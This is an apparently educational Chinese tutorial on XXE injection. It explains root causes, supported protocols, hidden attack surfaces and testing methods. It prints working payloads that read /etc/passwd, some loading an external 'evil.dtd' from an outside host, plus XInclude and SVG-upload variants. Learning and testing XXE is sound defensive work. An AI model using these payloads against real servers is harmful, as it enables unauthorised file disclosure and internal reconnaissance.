0x01 XXE(XML外部实体注入)漏洞
1.1 漏洞原因
XML外部实体注入(XML Extenrnal Entity Injection),简称XXE漏洞。引发XXE漏洞的主要原因是XML解析依赖库libxml默认开启了对外部实体的引用,导致服务端在解析用户提交的XML信息时未作处理直接进行解析,导致加载恶意的外部文件和代码,造成任意文件读取,命令执行、内网扫描等危害。
libxml<2.9 默认开启
1.2 漏洞构造方式
1.2.1 直接通过DTD外部实体声明
<?xml version="1.0"?>
<!DOCTYPE a[
<!ENTITY b SYSTEM "file:///etc/passwd">
]>
<a>&b;</a>
1.2.2 通过DTD外部实体声明引入外部DTD文档
#构造数据包
<?xml version="1.0"?>
<!DOCTYPE m [
<!ENTITY b SYSTEM "http://mark4z5.com/evil.dtd">
]>
<a>&b;</a>
#而http://mark4z5.com/evil.dtd内容为
<!ENTITY b SYSTEM "file:///etc/passwd">
1.2.3 通过DTD外部实体声明引入DTD文档
# 构造数据包
<?xml version="1.0"?>
<!DOCTYPE a [
<!ENTITY %b SYSTEM "http://mark4z5.com/evil.dtd">
]>
<a>%b;</a>
#http://mark4z5.com/evil.dtd文件内容
<!ENTITY b SYSTEM "file:///etc/passwd">
1.3 XML可解析的协议
libxml2 | file、http、ftp |
PHP | file、http、ftp、php、glob、data... |
JAVA | file、http、ftp、https、jar、gopher... |
.NET | file、http、ftp、https |
0x02 寻找XXE漏洞隐藏的攻击面
XXE漏洞的攻击面通常为HTTP传输流量下的XML数据请求,但是在其他方面可能也存在XXE漏洞。
2.1 XInclude攻击
一些应用程序在用户提交数据后,服务器将数据嵌入到XML文档中,然后对XML进行解析。例如当客户端提交的数据被放入后端的SOAP请求,然后由SOAP服务处理时,就会发生这种情况。
由于无法控制XML文档,对DTD文档进行修改触发而XXE漏洞,我们可以使用Xinclude进行攻击。XInclude 是一种使用元素、属性以及 URI 引用来合并 XML 文档的机制,它是XML规范的一部分,允许在子文档中构建XML文档。我们可以在XML文档中放入恶意数据来进行XInclude攻击,攻击条件为我们可以控制传输中的数据,将其替换为服务器短的XML文件。
通过参考XInclude命名空间和提供我们想要包含的文件路径,可以完成XInclude的XXE攻击。
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
2.2 通过文件上传进行XXE攻击
一些应用程序允许上传使用XML或者包含XML组件的格式文件,并且在服务端会对其进行处理、验证,常见的有DOCX、SVG等格式。
尤其在图片上传中,服务端可能期望获取到PNG、JPG格式的图片,但是服务端使用的处理库可能同样是支持SVG格式的,所以我们可以通过上传SVG格式的图片来进行XXE攻击。
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>
2.3 通过修改Content-Type头进行XXE攻击
大多数情况下,POST请求包使用的是默认的application/x-www-form-urlencoded。有些网站希望接收这种格式的请求,但会容忍其他内容类型,包括XML。
# 普通的请求包:
POST /action HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
foo=bar
# 可以替换为:
POST /action HTTP/1.0
Content-Type: text/xml
Content-Length: 52
<?xml version="1.0" encoding="UTF-8"?><foo>bar</foo>
如果应用程序容忍消息正文中包含 XML 的请求,并将正文内容解析为 XML,那么您只需将请求重新格式化为使用 XML 格式即可到达隐藏的 XXE 攻击面。
0x03 如何查找和测试XXE漏洞
通过定义一个指向系统文件的外部实体,尝试对系统文件目录进行遍历,查看返回包是否包含XXE注入信息。
构建http://dnslog.cn/等基于可控的外部实体注入,然后对可控URL进行监控,判断是否存在XXE漏洞。
对于用户端使用非XML文档交互的接口,使用XInclude攻击来尝试包含一个有用的系统文件。
参考资料:
XXE漏洞详解(XML外部实体注入)_谢公子的博客-CSDN博客
What is XXE (XML external entity) injection? Tutorial & Examples | Web Security Academy